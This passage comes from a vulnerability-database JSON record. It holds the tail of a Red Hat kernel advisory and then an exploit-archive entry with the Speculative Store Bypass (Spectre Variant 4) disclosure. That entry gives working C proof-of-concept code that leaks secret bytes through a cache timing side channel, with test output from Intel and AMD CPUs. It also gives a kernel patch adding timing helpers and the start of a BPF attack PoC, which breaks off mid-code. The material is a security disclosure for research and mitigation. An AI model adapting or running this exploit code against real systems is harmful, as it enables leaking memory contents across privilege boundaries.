clear the IBRS MSR bits correctly, thus fixing the bug. (BZ#1586146)\n\nUsers of kernel are advised to upgrade to these updated packages, which fix these bugs.\n\nThe system must be rebooted for this update to take effect.", "modified": "2018-07-10T20:29:39", "published": "2018-07-10T19:28:42", "id": "RHSA-2018:2161", "href": "https://access.redhat.com/errata/RHSA-2018:2161", "type": "redhat", "title": "(RHSA-2018:2161) Important: kernel security and bug fix update", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-05-23T02:47:33", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category dos / poc", "modified": "2018-05-23T00:00:00", "published": "2018-05-23T00:00:00", "id": "1337DAY-ID-30428", "href": "https://0day.today/exploit/description/30428", "title": "AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass Exploit", "type": "zdt", "sourceData": "/*\r\n======== Intro / Overview ========\r\nAfter Michael Schwarz made some interesting observations, we started\r\nlooking into variants other than the three already-known ones.\r\n \r\nI noticed that Intel's Optimization Manual says in\r\nsection 2.4.4.5 (\"Memory Disambiguation\"):\r\n \r\n A load instruction micro-op may depend on a preceding store. Many\r\n microarchitectures block loads until all preceding store address\r\n are known.\r\n The memory disambiguator predicts which loads will not depend on\r\n any previous stores. When the disambiguator predicts that a load\r\n does not have such a dependency, the load takes its data from the\r\n L1 data cache.\r\n Eventually, the prediction is verified. If an actual conflict is\r\n detected, the load and all succeeding instructions are re-executed.\r\n \r\nAccording to my experiments, this effect can be used to cause\r\nspeculative execution to continue far enough to execute a\r\nSpectre-style gadget on a pointer read from a memory slot to which a\r\nstore has been speculatively ignored. I have tested this behavior on\r\nthe following processors from Intel and AMD:\r\n \r\n - Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz [Skylake laptop]\r\n - AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G [AMD desktop]\r\n - Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz [Haswell desktop]\r\n \r\nI haven't yet tested this on any ARM CPU.\r\n \r\nInterestingly, only on the Skylake laptop, it seems to work when\r\ninterrupts and SMP are disabled while the test is running; on the\r\nother machines, it seems to only work when interrupts are enabled,\r\nmaybe because the kernel code cause some noise that garbles some\r\npredictor state or so? Or just because they mess up timing\r\nsomewhere...\r\n \r\n \r\nThere were mentions of data speculation on the netdev list, in a\r\nsomewhat different context:\r\n \r\nhttps://www.mail-archive.com/[email\u00a0protected]/msg212262.html\r\nhttps://www.mail-archive.com/[email\u00a0protected]/msg215369.html\r\n \r\nHowever, I'm not entirely sure about the terminology. Do\r\n\"data speculation\" and \"value speculation\" include speculating about\r\nthe *source* of data, or do they refer exclusively to directly\r\nspeculating about the *value* of data?\r\n \r\n \r\n \r\n \r\n \r\n======== Demo code (no privilege boundaries crossed) ========\r\nThis is some code that purely demonstrates the basic effect and shows\r\nthat it is possible to combine it with a Meltdown/Spectre-style\r\ngadget for leaking data into the cache. It does not cross any\r\nprivilege boundaries.\r\n \r\n----------------------- START -----------------------\r\n// compile with: gcc -o test test.c -Wall -DHIT_THRESHOLD={CYCLES}\r\n// optionally add: -DNO_INTERRUPTS\r\n \r\n#include <stdio.h>\r\n#include <sys/io.h>\r\n#include <err.h>\r\n#include <sys/mman.h>\r\n \r\n#define pipeline_flush() asm volatile(\"mov $0,\r\n%%eax\\n\\tcpuid\\n\\tlfence\" : /*out*/ : /*in*/ :\r\n\"rax\",\"rbx\",\"rcx\",\"rdx\",\"memory\")\r\n#define clflush(addr) asm volatile(\"clflush (%0)\"::\"r\"(addr):\"memory\")\r\n \r\n// source of high-latency pointer to the memory slot\r\nunsigned char **flushy_area[1000];\r\n#define flushy (flushy_area+500)\r\n \r\n// memory slot on which we want bad memory disambiguation\r\nunsigned char *memory_slot_area[1000];\r\n#define memory_slot (memory_slot_area+500)\r\n \r\n// 0123456789abcdef\r\nunsigned char secret_read_area[] = \"0000011011101011\";\r\nunsigned char public_read_area[] = \"################\";\r\n \r\nunsigned char timey_line_area[0x200000];\r\n// stored in the memory slot first\r\n#define timey_lines (timey_line_area + 0x10000)\r\n \r\nunsigned char dummy_char_sink;\r\n \r\nint testfun(int idx) {\r\n pipeline_flush();\r\n *flushy = memory_slot;\r\n *memory_slot = secret_read_area;\r\n timey_lines['0' << 12] = 1;\r\n timey_lines['1' << 12] = 1;\r\n pipeline_flush();\r\n clflush(flushy);\r\n clflush(&timey_lines['0' << 12]);\r\n clflush(&timey_lines['1' << 12]);\r\n asm volatile(\"mfence\");\r\n pipeline_flush();\r\n \r\n // START OF CRITICAL PATH\r\n unsigned char **memory_slot__slowptr = *flushy;\r\n //pipeline_flush();\r\n // the following store will be speculatively ignored since its\r\naddress is unknown\r\n *memory_slot__slowptr = public_read_area;\r\n // uncomment the instructions in the next line to break the attack\r\n asm volatile(\"\" /*\"mov $0, %%eax\\n\\tcpuid\\n\\tlfence\"*/ : /*out*/ :\r\n/*in*/ : \"rax\",\"rbx\",\"rcx\",\"rdx\",\"memory\");\r\n // architectual read from dummy_timey_line, possible\r\nmicroarchitectural read from timey_line\r\n dummy_char_sink = timey_lines[(*memory_slot)[idx] << 12];\r\n // END OF CRITICAL PATH\r\n \r\n unsigned int t1, t2;\r\n \r\n pipeline_flush();\r\n asm volatile(\r\n \"lfence\\n\\t\"\r\n \"rdtscp\\n\\t\"\r\n \"mov %%eax, %%ebx\\n\\t\"\r\n \"mov (%%rdi), %%r11\\n\\t\"\r\n \"rdtscp\\n\\t\"\r\n \"lfence\\n\\t\"\r\n ://out\r\n \"=a\"(t2),\r\n \"=b\"(t1)\r\n ://in\r\n \"D\"(timey_lines + 0x1000 * '0')\r\n ://clobber\r\n \"r11\",\r\n \"rcx\",\r\n \"rdx\",\r\n \"memory\"\r\n );\r\n pipeline_flush();\r\n unsigned int delay_0 = t2 - t1;\r\n \r\n pipeline_flush();\r\n asm volatile(\r\n \"lfence\\n\\t\"\r\n \"rdtscp\\n\\t\"\r\n \"mov %%eax, %%ebx\\n\\t\"\r\n \"mov (%%rdi), %%r11\\n\\t\"\r\n \"rdtscp\\n\\t\"\r\n \"lfence\\n\\t\"\r\n ://out\r\n \"=a\"(t2),\r\n \"=b\"(t1)\r\n ://in\r\n \"D\"(timey_lines + 0x1000 * '1')\r\n ://clobber\r\n \"r11\",\r\n \"rcx\",\r\n \"rdx\",\r\n \"memory\"\r\n );\r\n pipeline_flush();\r\n unsigned int delay_1 = t2 - t1;\r\n \r\n if (delay_0 < HIT_THRESHOLD && delay_1 > HIT_THRESHOLD) {\r\n pipeline_flush();\r\n return 0;\r\n }\r\n if (delay_0 > HIT_THRESHOLD && delay_1 < HIT_THRESHOLD) {\r\n pipeline_flush();\r\n return 1;\r\n }\r\n pipeline_flush();\r\n return -1;\r\n}\r\n \r\nint main(void) {\r\n char out[100000];\r\n char *out_ = out;\r\n \r\n#ifdef NO_INTERRUPTS\r\n if (mlockall(MCL_CURRENT|MCL_FUTURE) || iopl(3))\r\n err(1, \"iopl(3)\");\r\n#endif\r\n \r\n for (int idx = 0; idx < 16; idx++) {\r\n#ifdef NO_INTERRUPTS\r\n asm volatile(\"cli\");\r\n#endif\r\n pipeline_flush();\r\n long cycles = 0;\r\n int hits = 0;\r\n char results[33] = {0};\r\n /* if we don't break the loop after some time when it doesn't\r\nwork, in NO_INTERRUPTS mode with SMP disabled, the machine will lock\r\nup */\r\n while (hits < 32 && cycles < 1000000) {\r\n pipeline_flush();\r\n int res = testfun(idx);\r\n if (res != -1) {\r\n pipeline_flush();\r\n results[hits] = res + '0';\r\n hits++;\r\n }\r\n cycles++;\r\n pipeline_flush();\r\n }\r\n pipeline_flush();\r\n#ifdef NO_INTERRUPTS\r\n asm volatile(\"sti\");\r\n#endif\r\n out_ += sprintf(out_, \"%c: %s in %ld cycles (hitrate: %f%%)\\n\",\r\nsecret_read_area[idx], results, cycles, 100*hits/(double)cycles);\r\n }\r\n printf(\"%s\", out);\r\n pipeline_flush();\r\n}\r\n----------------------- END -----------------------\r\n \r\n \r\nResults:\r\n \r\nIn the following, \"SMP off\" means that I have executed this\r\ncommand:\r\n# for file in /sys/devices/system/cpu/cpu*/online; do echo 0 > $file; done\r\n \r\nFor the Intel machines, \"turbo off\" means that I've executed the\r\nfollowing command:\r\n# echo 1 > /sys/devices/system/cpu/intel_pstate/no_turbo\r\n \r\nSkylake laptop, normal:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50\r\n$ ./test\r\n0: 00000000000000000000000000000000 in 61944 cycles (hitrate: 0.051660%)\r\n0: 00000000000000000000000000000000 in 36467 cycles (hitrate: 0.087751%)\r\n0: 00000000000000000000000000000000 in 36788 cycles (hitrate: 0.086985%)\r\n0: 00000000000000000000000000000000 in 36800 cycles (hitrate: 0.086957%)\r\n0: 00000000000000000000000000000000 in 35797 cycles (hitrate: 0.089393%)\r\n1: 11111111111111111111111111111111 in 48923 cycles (hitrate: 0.065409%)\r\n1: 11111111111111111111111111111111 in 44525 cycles (hitrate: 0.071870%)\r\n0: 00000000000000000000000000000000 in 44813 cycles (hitrate: 0.071408%)\r\n1: 11111111111111111111111111111111 in 40625 cycles (hitrate: 0.078769%)\r\n1: 11111111111111111111111111111111 in 40897 cycles (hitrate: 0.078245%)\r\n1: 11111111111111111111111111111111 in 39648 cycles (hitrate: 0.080710%)\r\n0: 00000000000000000000000000000000 in 40737 cycles (hitrate: 0.078553%)\r\n1: 11111111111111111111111111111111 in 37850 cycles (hitrate: 0.084544%)\r\n0: 00000000000000000000000000000000 in 46062 cycles (hitrate: 0.069472%)\r\n1: 11111111111111111111111111111111 in 44929 cycles (hitrate: 0.071223%)\r\n1: 11111111111111111111111111111111 in 37465 cycles (hitrate: 0.085413%)\r\n \r\nSkylake laptop, SMP off, interrupts off, turbo off:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS\r\n$ sudo ./test\r\n0: 00000000000000000000000000000000 in 34697 cycles (hitrate: 0.092227%)\r\n0: 00000000000000000000000000000000 in 32625 cycles (hitrate: 0.098084%)\r\n0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)\r\n0: 00000000000000000000000000000000 in 34680 cycles (hitrate: 0.092272%)\r\n0: 00000000000000000000000000000000 in 32302 cycles (hitrate: 0.099065%)\r\n1: 11111111111111111111111111111111 in 33240 cycles (hitrate: 0.096270%)\r\n1: 11111111111111111111111111111111 in 33738 cycles (hitrate: 0.094849%)\r\n0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)\r\n1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)\r\n1: 11111111111111111111111111111111 in 32531 cycles (hitrate: 0.098368%)\r\n1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)\r\n0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)\r\n1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)\r\n0: 00000000000000000000000000000000 in 32193 cycles (hitrate: 0.099400%)\r\n1: 11111111111111111111111111111111 in 32167 cycles (hitrate: 0.099481%)\r\n1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)\r\n \r\nHaswell PC, normal:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50\r\n$ ./test\r\n0: 00000000000000000000000000000000 in 119737 cycles (hitrate: 0.026725%)\r\n0: 00000000000000000000000000000000 in 45340 cycles (hitrate: 0.070578%)\r\n0: 00000000000000000000000000000000 in 39127 cycles (hitrate: 0.081785%)\r\n0: 00000000000000000000000000000000 in 39567 cycles (hitrate: 0.080875%)\r\n0: 00000000000000000000000000000000 in 35164 cycles (hitrate: 0.091002%)\r\n1: 11111111111111111111111111111111 in 33770 cycles (hitrate: 0.094759%)\r\n1: 11111111111111111111111111111111 in 36743 cycles (hitrate: 0.087091%)\r\n0: 00000000000000000000000000000000 in 36749 cycles (hitrate: 0.087077%)\r\n1: 11111111111111111111111111111111 in 35686 cycles (hitrate: 0.089671%)\r\n1: 11111111111111111111111111111111 in 35843 cycles (hitrate: 0.089278%)\r\n1: 11111111111111111111111111111111 in 35826 cycles (hitrate: 0.089321%)\r\n0: 00000000000000000000000000000000 in 35302 cycles (hitrate: 0.090646%)\r\n1: 11111111111111111111111111111111 in 34256 cycles (hitrate: 0.093414%)\r\n0: 00000000000000000000000000000000 in 36604 cycles (hitrate: 0.087422%)\r\n1: 11111111111111111111111111111111 in 36795 cycles (hitrate: 0.086968%)\r\n1: 11111111111111111111111111111111 in 37820 cycles (hitrate: 0.084611%)\r\n \r\nHaswell PC, SMP off, interrupts off, turbo off:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS\r\n$ sudo ./test\r\n0: 00000000000000000000000000000000 in 32770 cycles (hitrate: 0.097650%)\r\n0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)\r\n0: 00000000000000000000000000000000 in 32783 cycles (hitrate: 0.097612%)\r\n0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)\r\n0: 00000000000000000000000000000000 in 37455 cycles (hitrate: 0.085436%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n0: 00000000000000000000000000000000 in 39894 cycles (hitrate: 0.080213%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n1: 11111111111111111111111111111111 in 33845 cycles (hitrate: 0.094549%)\r\n0: in 1000000 cycles (hitrate: 0.000000%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n0: 00000000000000000000000000000000 in 44050 cycles (hitrate: 0.072645%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n \r\nAMD desktop, normal:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99\r\n$ ./test\r\n0: 0000000000000000000000000 in 1000000 cycles (hitrate: 0.002500%)\r\n0: 000000000000000000000 in 1000000 cycles (hitrate: 0.002100%)\r\n0: 00000000000000000000000000000000 in 939816 cycles (hitrate: 0.003405%)\r\n0: 00000000000000000000000000000000 in 903838 cycles (hitrate: 0.003540%)\r\n0: 00000000000000000000000000000000 in 360430 cycles (hitrate: 0.008878%)\r\n1: 11111111111111111111111111111111 in 484242 cycles (hitrate: 0.006608%)\r\n1: 11111111111111111111111111111111 in 331271 cycles (hitrate: 0.009660%)\r\n0: 00000000000000000000000000000000 in 388049 cycles (hitrate: 0.008246%)\r\n1: 11111111111111111111111111111111 in 282588 cycles (hitrate: 0.011324%)\r\n1: 11111111111111111111111111111111 in 359558 cycles (hitrate: 0.008900%)\r\n1: 11111111111111111111111111111111 in 359013 cycles (hitrate: 0.008913%)\r\n0: 0000000000000000000000000000000 in 1000000 cycles (hitrate: 0.003100%)\r\n1: 11111111111111111111111111111111 in 501067 cycles (hitrate: 0.006386%)\r\n0: 00000000000000000000000000000000 in 312420 cycles (hitrate: 0.010243%)\r\n1: 11111111111111111111111111111111 in 784663 cycles (hitrate: 0.004078%)\r\n1: 11111111111111111111111111111111 in 954189 cycles (hitrate: 0.003354%)\r\n \r\nAMD desktop, SMP off, interrupts off:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99 -DNO_INTERRUPTS\r\n$ sudo ./test\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n \r\n \r\n \r\n \r\n \r\n======== assisted BPF PoC ========\r\nThis is a PoC that demonstrates that this issue can potentially be\r\nused to attack the Linux kernel's BPF subsystem.\r\nThis is *NOT* a full exploit against BPF; this is a PoC that requires\r\nkernel patches that permit the PoC to flush kernel memory from inside\r\nBPF and to measure access times to BPF arrays. It seems probable that\r\nthese restrictions could be overcome, but my PoC doesn't do that.\r\n \r\nThe basic idea here is to cause a speculative type confusion:\r\n \r\n1. Store a number N at address A on the stack.\r\n2. Write a pointer P to address A, using a high-latency\r\n expression to compute A.\r\n3. Read a value X from address A, with A specified using a low-latency\r\n expression. Architecturally, X is P; however, microarchitecturally,\r\n X can be N.\r\n4. Use the Spectre/Meltdown gadget to leak the value X points to into\r\n the cache.\r\n \r\nThe attack benefits from the unique property of eBPF that the engine\r\nperforms relatively complicated value tracking, but does not\r\nnormally use the resulting information to modify the code in any way\r\n(e.g. by optimizing things away). It is not clear how applicable this\r\nattack would be to e.g. other scripting languages, or whether it is an\r\nissue for non-scripting code.\r\n \r\nI have only tested this PoC on an Intel Skylake CPU.\r\n \r\n \r\nKernel patch required for the PoC to work (copy attached, so that it\r\napplies cleanly), to be applied to the 4.15.1 stable kernel:\r\n \r\n----------------------- START -----------------------\r\ndiff --git a/include/linux/bpf.h b/include/linux/bpf.h\r\nindex 0b25cf87b6d6..896b4f483fe2 100644\r\n--- a/include/linux/bpf.h\r\n+++ b/include/linux/bpf.h\r\n@@ -591,6 +591,7 @@ extern const struct bpf_func_proto bpf_skb_vlan_push_proto;\r\n extern const struct bpf_func_proto bpf_skb_vlan_pop_proto;\r\n extern const struct bpf_func_proto bpf_get_stackid_proto;\r\n extern const struct bpf_func_proto bpf_sock_map_update_proto;\r\n+extern const struct bpf_func_proto bpf_clflush_mfence_proto;\r\n \r\n /* Shared helpers among cBPF and eBPF. */\r\n void bpf_user_rnd_init_once(void);\r\ndiff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c\r\nindex 3d24e238221e..379dc888cb81 100644\r\n--- a/kernel/bpf/helpers.c\r\n+++ b/kernel/bpf/helpers.c\r\n@@ -179,3 +179,17 @@ const struct bpf_func_proto bpf_get_current_comm_proto = {\r\n .arg1_type = ARG_PTR_TO_UNINIT_MEM,\r\n .arg2_type = ARG_CONST_SIZE,\r\n };\r\n+\r\n+BPF_CALL_1(bpf_clflush_mfence, void *, target) {\r\n+ asm volatile(\"mfence\\n\\tclflush (%0)\\n\\tmfence\"::\"r\"(target):\"memory\");\r\n+ return 0;\r\n+}\r\n+\r\n+const struct bpf_func_proto bpf_clflush_mfence_proto = {\r\n+ .func = bpf_clflush_mfence,\r\n+ .ret_type = RET_INTEGER,\r\n+ /* theoretically permits CLFLUSH on invalid addresses,\r\n+ * but the PoC doesn't do that\r\n+ */\r\n+ .arg1_type = ARG_DONTCARE\r\n+};\r\ndiff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c\r\nindex 5cb783fc8224..2dd9a2a95630 100644\r\n--- a/kernel/bpf/syscall.c\r\n+++ b/kernel/bpf/syscall.c\r\n@@ -605,6 +605,85 @@ static int map_lookup_elem(union bpf_attr *attr)\r\n return err;\r\n }\r\n \r\n+static int map_time_flush_loc(union bpf_attr *attr)\r\n+{\r\n+ void __user *ukey = u64_to_user_ptr(attr->key);\r\n+ void __user *uvalue = u64_to_user_ptr(attr->value);\r\n+ int ufd = attr->map_fd;\r\n+ struct bpf_map *map;\r\n+ void *key, *ptr;\r\n+ struct fd f;\r\n+ int err = 0;\r\n+ u64 delay = 0;\r\n+\r\n+ f = fdget(ufd);\r\n+ map = __bpf_map_get(f);\r\n+ if (IS_ERR(map))\r\n+ return PTR_ERR(map);\r\n+\r\n+ if (!(f.file->f_mode & FMODE_CAN_READ)) {\r\n+ err = -EPERM;\r\n+ goto err_put;\r\n+ }\r\n+\r\n+ if (map->map_type != BPF_MAP_TYPE_ARRAY) {\r\n+ err = -EINVAL;\r\n+ goto err_put;\r\n+ }\r\n+\r\n+ if (attr->flags > 0x100000 || attr->flags >= map->value_size) {\r\n+ err = -EINVAL;\r\n+ goto err_put;\r\n+ }\r\n+ asm volatile(\"lfence\");\r\n+\r\n+ key = memdup_user(ukey, map->key_size);\r\n+ if (IS_ERR(key)) {\r\n+ err = PTR_ERR(key);\r\n+ goto err_put;\r\n+ }\r\n+\r\n+ rcu_read_lock();\r\n+ ptr = map->ops->map_lookup_elem(map, key);\r\n+ if (ptr) {\r\n+ unsigned int t1, t2;\r\n+ ptr = (char*)ptr + attr->flags;\r\n+ asm volatile(\r\n+ \"xor %%r11, %%r11\\n\\t\"\r\n+ \"lfence\\n\\t\"\r\n+ \"rdtscp\\n\\t\"\r\n+ \"mov %%eax, %%ebx\\n\\t\"\r\n+ \"mov (%%rdi), %%r11b\\n\\t\"\r\n+ \"rdtscp\\n\\t\"\r\n+ \"mfence\\n\\t\"\r\n+ \"clflush (%%rdi)\\n\\t\"\r\n+ \"mfence\\n\\t\"\r\n+ ://out\r\n+ \"=a\"(t2),\r\n+ \"=b\"(t1)\r\n+ ://in\r\n+ \"D\"(ptr)\r\n+ ://clobber\r\n+ \"r11\",\r\n+ \"rcx\",\r\n+ \"rdx\",\r\n+ \"memory\"\r\n+ );\r\n+ delay = t2 - t1;\r\n+ }\r\n+ rcu_read_unlock();\r\n+ if (copy_to_user(uvalue, &delay, 8)) {\r\n+ err = -EINVAL;\r\n+ goto free_key;\r\n+ }\r\n+\r\n+free_key:\r\n+ kfree(key);\r\n+err_put:\r\n+ fdput(f);\r\n+ return err;\r\n+}\r\n+\r\n #define BPF_MAP_UPDATE_ELEM_LAST_FIELD flags\r\n \r\n static int map_update_elem(union bpf_attr *attr)\r\n@@ -1713,6 +1792,9 @@ SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr\r\n__user *, uattr, unsigned int, siz\r\n case BPF_MAP_UPDATE_ELEM:\r\n err = map_update_elem(&attr);\r\n break;\r\n+ case 0x13370001:\r\n+ err = map_time_flush_loc(&attr);\r\n+ break;\r\n case BPF_MAP_DELETE_ELEM:\r\n err = map_delete_elem(&attr);\r\n break;\r\ndiff --git a/net/core/filter.c b/net/core/filter.c\r\nindex 1c0eb436671f..e310a345054c 100644\r\n--- a/net/core/filter.c\r\n+++ b/net/core/filter.c\r\n@@ -3347,6 +3347,8 @@ bpf_base_func_proto(enum bpf_func_id func_id)\r\n return &bpf_tail_call_proto;\r\n case BPF_FUNC_ktime_get_ns:\r\n return &bpf_ktime_get_ns_proto;\r\n+ case 4:\r\n+ return &bpf_clflush_mfence_proto;\r\n case BPF_FUNC_trace_printk:\r\n if (capable(CAP_SYS_ADMIN))\r\n return bpf_get_trace_printk_proto();\r\n----------------------- END -----------------------\r\n \r\n \r\nThe PoC:\r\n \r\n----------------------- START -----------------------\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#include <pthread.h>\r\n#include <assert.h>\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <pthread.h>\r\n#include <errno.h>\r\n#include <limits.h>\r\n#include <stdbool.h>\r\n#include <stdlib.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <stddef.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n#include <sys/mman.h>\r\n#include <sys/user.h>\r\n \r\n#define GPLv2 \"GPL v2\"\r\n#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n \r\n \r\n \r\n/* registers */\r\n/* caller-saved: r0..r5 */\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_REG_CTX BPF_REG_6\r\n#define BPF_REG_FP BPF_REG_10\r\n \r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_LD_ABS(SIZE, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n \r\n \r\n \r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n \r\nint array_create(int value_size, int num_entries) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = value_size,\r\n .max_entries = num_entries\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n if (mapfd == -1)\r\n err(1, \"map create\");\r\n return mapfd;\r\n}\r\n \r\nunsigned int array_time_flush_loc(int mapfd, uint32_t idx, uint32_t off) {\r\n uint64_t time;\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&idx,\r\n .value = (uint64_t)&time,\r\n .flags = off,\r\n };\r\n \r\n int res = bpf_(0x13370001, &attr);\r\n if (res)\r\n err(1, \"map flush loc\");\r\n return time;\r\n}\r\n \r\nvoid array_set_dw(int mapfd, uint32_t key, uint64_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n };\r\n \r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n \r\nint prog_load(struct bpf_insn *insns, size_t insns_count) 